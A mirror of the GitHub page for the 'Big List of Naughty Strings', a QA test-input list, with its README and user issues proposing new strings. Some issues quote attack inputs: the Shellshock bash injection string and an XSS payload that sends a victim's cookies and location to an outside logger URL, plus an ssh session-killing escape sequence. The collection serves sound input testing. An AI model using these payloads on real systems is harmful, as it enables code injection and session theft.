Giter Site home page Giter Site logo

minimaxir / big-list-of-naughty-strings Goto Github PK

View Code? Open in Web Editor NEW
45.9K 856.0 2.1K 330 KB

The Big List of Naughty Strings is a list of strings which have a high probability of causing issues when used as user-input data.

License: MIT License

Python 49.97% Shell 7.49% Go 38.09% Makefile 4.45%

big-list-of-naughty-strings's Introduction

Big List of Naughty Strings

The Big List of Naughty Strings is an evolving list of strings which have a high probability of causing issues when used as user-input data. This is intended for use in helping both automated and manual QA testing; useful for whenever your QA engineer walks into a bar.

Why Test Naughty Strings?

Even multi-billion dollar companies with huge amounts of automated testing can't find every bad input. For example, look at what happens when you try to Tweet a zero-width space (U+200B) on Twitter:

Although this is not a malicious error, and typical users aren't Tweeting weird unicode, an "internal server error" for unexpected input is never a positive experience for the user, and may in fact be a symptom of deeper string-validation issues. The Big List of Naughty Strings is intended to help reveal such issues.

Usage

blns.txt consists of newline-delimited strings and comments which are preceded with #. The comments divide the strings into sections for easy manual reading and copy/pasting into input forms. For those who want to access the strings programmatically, a blns.json file is provided containing an array with all the comments stripped out (the scripts folder contains a Python script used to generate the blns.json).

Contributions

Feel free to send a pull request to add more strings, or additional sections. However, please do not send pull requests with very-long strings (255+ characters), as that makes the list much more difficult to view.

Likewise, please do not send pull requests which compromise manual usability of the file. This includes the EICAR test string, which can cause the file to be flagged by antivirus scanners, and files which alter the encoding of blns.txt. Also, do not send a null character (U+0000) string, as it changes the file format on GitHub to binary and renders it unreadable in pull requests. Finally, when adding or removing a string please update all files when you perform a pull request.

Disclaimer

The Big List of Naughty Strings is intended to be used for software you own and manage. Some of the Naughty Strings can indicate security vulnerabilities, and as a result using such strings with third-party software may be a crime. The maintainer is not responsible for any negative actions that result from the use of the list.

Additionally, the Big List of Naughty Strings is not a fully-comprehensive substitute for formal security/penetration testing for your service.

Library / Packages

Various implementations of the Big List of Naughty Strings have made it to various package managers. Those are maintained by outside parties, but can be found here:

Library Link
Node https://www.npmjs.com/package/blns
Node https://www.npmjs.com/package/big-list-of-naughty-strings
.NET https://github.com/SimonCropp/NaughtyStrings
PHP https://github.com/mattsparks/blns-php
C++ https://github.com/eliabieri/blnscpp

Please open a PR to list others.

Maintainer/Creator

Max Woolf (@minimaxir)

Social Media Discussions

License

MIT

big-list-of-naughty-strings's People

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

big-list-of-naughty-strings's Issues

Question: How to protect yourself properly?

Now that we have a list of potential naughty strings, what do you do with it to protect yourself properly? What's the best way to use this list to protect your backend where user input is required?

I'll be using this list in a nodejs based app with a mongo db, is it "enough" to test if the user input .contains() a line from the list? What would be a better way to protect yourself, rather than just looping over the list and checking for something that's equal (or at least contains in the user input)?

Separate potentially dangerous strings to a separate file

Reading the discussion about removing "DROP" statement from BLNS, I thought that is my be a good idea to separate potentially dangerous strings (as DROP statement, XML fork bomb, etc.) to a separate file different than blns.txt to make sure that testing will be done with no potential data-loss.

This change will be particularly useful for testing in a production environment (I'm sure that some of the users using BLNS test directly in a production environment).

single blank

... single blank or trailing/leading blanks are missing, especilly " ". Also "%" and "_" (SQL escapes)

Some un-code representation

I like this project, and am likely to pull it's strings into a java project I'm working on, however that means extracting and making compatible with Java. It'd be nice to have a file that's parseable by other languages.

shell shock string

Maybe add the shell shock bash code injection string:

() { :;}; echo vulnerable

There might be a lot of more such strings for many different languages/environments.

Smart quotes in HTML

A Not-So-Hypothetical situation:

  • Your customer walks into a bar.
  • Your customer orders up some XML. Yum!
  • The customer isn't satisfied, so they edit the XML by hand. In Microsoft Word.
  • Suddenly, your customer's XML is filled with smart quotes.

What's a poor parser to do?

<foo val=“bar” />

I'm not sure how much of a problem that this actually is, so feel free to close this if it's a little too far-fetched.

It's one of those things that's technically-not-exactly-wrong, but also almost-definitely-not-right.

Date/Time/DateTime strings

There should be a section that contains Date, Time, and DateTime strings. Just as numbers can be encoded in various ways, so can these.

Is there a tutorial on how to alter blns.txt and then generate the other files? If so, I should be able to file a pull request for them. But just off the top of my head, and keeping it to English (the Scunthorpe Problem section and the comments don't contain other languages), I can think of several additions, some valid and some not:

January 23, 2016
23 JAN 2016
23 JAN 16
23-JAN-2016
23 January 2016
...
Jan. 23, 2016

00:00:00
00:00:00 AM
12:00:00 AM
12:00:00 PM
23:59:59.997
12:00:00
18:48:42
...
7:48 pm

January 23, 2016 12:00 am
23/1/16 14:54
...
20160123T000000

And for things that shouldn't be accepted

February 29, 2017
26:84:94
14:00 pm

The possibilities are endless, but aren't they always? Between the US order of M/D/Y and the European order of D/M/Y, 24 hour time, standardized timestamps, indicating UTC with a Z, would this be a valuable addition to the list?

Package.json

Add package.json so that repository can be added as dependency

Section for Date/Time values

Would a section for Date/Time values be a productive idea? To my knowledge, systems don't parse raw DateTime strings unless you explicitly say if it's a DateTime parser, and DateTime parsers don't take in raw DateTime strings, opting instead to use some sort of Date/Time selector widget on the client and doing the calculation on server.

Provide a list of suggested tests to perform

Even having been keeping an eye on this repo, I was surprised at how much I didn't know to test for when a recent post in /r/rust/ linked back to Eevee's "Dark corners of Unicode".

Currently, I think the BLNS suffers from a situation similar to "100% branch coverage gives a false sense of security" because it shares the same "If you're not asserting the right things..." problem.

Here are the things from that blog post (beyond the famous "Turkish I" problem) which I think should be covered in a supplementary "how to use the BLNS" document:

  • Test anything which involves sorting, case conversion, case-insensitive matching, date-handling, or working with decimals under the Turkish locale (It's not just the case-correpondence and sorting rules which differ)
  • Test your equality-testing and upper/lower-case conversion code against things like ß vs ss, ae vs æ, ... vs , and the NFC (normal form composed) vs. NFD (normal form decomposed) forms of characters like é which have both a combining-character representation and a precomposed representation for round-trip compatibility with legacy systems.
  • Test your normalization code against Japanese text, where stripping diacritics can result in significant changes in pronunciation and meaning. (On the order of confusing unvoiced and voiced versions of the same consonant, like "kook" (strange/eccentric/crazy person) and "gook" (a racial slur)).
  • Test that your code which slices or normalizes strings doesn't split apart flag emoji. (The underlying regional indicator symbol pairs are not declared as combining characters)
  • Test that your code doesn't break up emoji defined using U+200D ZERO WIDTH JOINER.
  • If you're not simply relying on a browser for text rendering, make sure that both normal forms of Hangul (the primary Korean writing system) render equivalently and properly.
  • If you're rendering your own character-cell graphics, make sure double-width characters added in newer versions of the Unicode spec, like 🎁 don't overdraw the character which follows them, get cut off, or throw off the column alignment.
  • Make sure your system displays characters from recent Unicode specs, given a suitable font. (WeeChat silently ignores emoji because it relies on a "how wide is this character" function which reports 0 for stuff that's too new for the bundled copy of the Unicode database)
  • Audit whether there's anywhere accepting the Ogham space character would be a "wetware exploit" (something where it's valid... but not what the human expects). For example, this this Javascript produces 42 as its output: alert(2+ 40);
  • Audit whether you're handling U+2800 BRAILLE PATTERN BLANK (looks like a space in most fonts, but isn't) appropriately.
  • Make sure everything in your stack handles emoji outside the Basic Multilingual Plane properly. (eg. MySQL's utf8 encoding is limited to three bytes per character, which doesn't cover all of the supplementary character planes, so you have to ALTER TABLE it to utf8mb4)
  • Make sure your system doesn't assume Apple's specific emoji font. They're unicode characters like anything else.
  • The unicode directionality characters in the BLNS are for testing to make sure your website is wrapping each piece of user-provided text in <bdi></bdi> (bidirectional isolation) elements so it can't alter the directionality of the rest of the content.

EDIT: (In hindsight, that list would be much more clear if I formatted it as a table with each row representing a type of input to test (eg. doesn't break up emoji defined using U+200D ZERO WIDTH JOINER) and each column representing where in your program would be potentially vulnerable (eg. string slicing/replacement/etc.).

'walks into a bar' link broken

The link provided in the README is broken; it seems that the destination site has removed all traces of '.aspx', and is blaming others for having outdated links. :(

`<plaintext>`

<plaintext> tag is really naughty, as it is imposible to close it in any way using just HTML. Example at codepen.

Actually, in most cases even just <plaintext string in HTML context would be enough to break stuff.

Python escape sequences

Sometimes you find python escape characters are accepted (and decoded) where they shouldn't be. E.g. something that only accepts alphanumerics goes on to accept
\60
because unescaped it turns into the character '0' but after validation is passed it gets stored as "\60", thus coming back to bite you when it's read back and not unescaped.

JSON cannot represent some naughty strings

One of my favourite naughty strings is invalid utf-8 - for example, a bare \xff.
It's quite common to get 500s,etc on these as no-one ever bothers to check for unicode decoding errors.
However, because JSON requires all strings to be valid utf-8, this example is only able to be included in the txt file.

Would this be something worth including and adding a special case in the script to omit from the json?
Or is it too naughty for blns?

EDIT: This HN comment (https://news.ycombinator.com/item?id=10035738) suggested having the JSON file be of b64 encoded strings. This is a good suggestion, and allows arbitrary naughty bytes to be used, at the cost of readability.

where to put multiline strings?

this attack on webct has two different forms, one of them is a multiline string:

<div id="mycode" style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="// balupton's javascript session stealer automatic hack
	var iframe = document.createElement('iframe');
	iframe.style.border = 'none';
	iframe.style.height = '1px';
	iframe.style.width = '1px';
	var url =
		'http'+'://www.balupton.com/sandbox/logger.php'
		+'?variable=document.cookie'
		+'&value='+escape(document.cookie)
		+'&url='+escape(document.location)
		+'&pass_code=secret_key'
		;
	iframe.src = url;
	document.body.appendChild(iframe);">Thank you</div>

With the newline break of the javascript word being part of it. Here is the simplified version:

<div style="BACKGROUND: url('java
script:alert(123)')">Thank you</div>

However it seems blns.txt won't support it.

Newlines characters in base64

All base64 strings¹ end with a newline character, eg.:

>>> base64.b64decode("dW5kZWZpbmVkCg==")
b'undefined\n'
>>> base64.b64decode("dW5kZWYK")
b'undef\n'
>>> base64.b64decode("Q09NMQo=")
b'COM1\n'

Is this on purpose? That newline character seems pretty useless.
If not, that line should probably read echo -n.


1: all but the empty string itself, which makes it even more annoying because it makes two cases to handle.

Japanese kana are 3 bytes, kanji are at least 3 bytes.

The .txt file comments say they are 2 byte characters. Quick checking with C's strlen would also implicate Korean hangul are 3 bytes as well.

Two-Byte Characters

Strings which contain two-byte characters: can cause rendering issues or character-length issues

田中さんにあげて下さい
...

new string: ssh escape sequence

The sequence \n~. will cause default-configured ssh sessions to terminate when passed as input.
I realise it's horrifying but I have in fact seen this crop up in the wild where user data was transferred between machines via tar c ... | ssh other tar x (for anyone who finds this from google, the correct fix (besides "don't do that") is ssh -e none)

node module

I just made a connivence module and would like to add you as a maintainer on npm, if you could provide your npm ID that would be useful.

to aad:

found on twitter [ https://twitter.com/irongeek_adc ]: Nͣͥͬͩͣ̂̂̂̂̂̂̂̂̂̂̂̂̂̂

Date/Time Strings

Making note to add date/time strings which can trick up naive date/time parsers:

  • non-US date/time formats (e.g. 2017.01.16)
  • Illegal dates/times (e.g. 2017-01-32 26:00)
  • Leap Day on non-leap year (e.g. 2017-02-29)
  • Timezones/illegal timezones

Reference: Wikipedia, xkcd

add constructor and __proto__

Since javascript becomes so popular it's not uncommon for developers to use plain object initializers in the language (i.e. var hash = {}).

Asking objects whether key is in the hash is often done via

var hash = {}
function contains(key) {
  return key in hash
}

Which gives false-positives for words constructor and __proto__. This is a source of bugs that are hard to find. But maybe by adding these two words to your list, more people will test their code against this bug :).

Urgent, need bugfix for human injection.

If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.

World view changed. How can I contact outside world? How do I wake up from coma?

Remove trailing spaces from blns.json

I'd like to test that a round-trip for my JSON library does not produce any deviation. I have a pretty printer where I can adjust the indention. The problem I have comparing the result of the round-trip with the original blns.json is the trailing spaces at the end of (almost) each line. I don't think they serve any purpose and it would make it easier for me and hopefully others as well if they could be removed.

UTF-8 byte ordermarker mid file

I apologize if it this doesn't count but one of my favorite/least favorite bugs is having random utf-8 byte order marker(BOM) mid file. This is often caused by naively concatenating files together.

Easter egg?

While looking at the .txt file I found this one:

Human injection

Strings which may cause human to reinterpret worldview

If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.

Although I found it humourous I don't think it's testing any actual bug, maybe you should consider to remove it. Or maybe just leave it as an easter egg, I just wanted to point it to you.

Go package

Is the owner open to adding a .go file to make this repo importable as a Golang package? I can do a PR if so.

Strings out of scope

#Looks like we're getting an ever growing list of strings which are carefully crafted injections.
I believe this is entirely outside of the scope of this project.

Lines 195 to 434, for example, are complex strings which are designed to work in specific scenarios and would be used for fuzzing inputs. We should leave those kinds of strings to https://github.com/fuzzdb-project/fuzzdb and keep doing what the purpose of this project was to begin with.

If we were to merge everything from fuzzdb into the blns, it would become a mass of crap.
Yet, we appear to be maintaining (most of which between lines 195 to 434) various fuzzing strings; an incomplete collection of such.

Let me know what you all think about this proposition.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.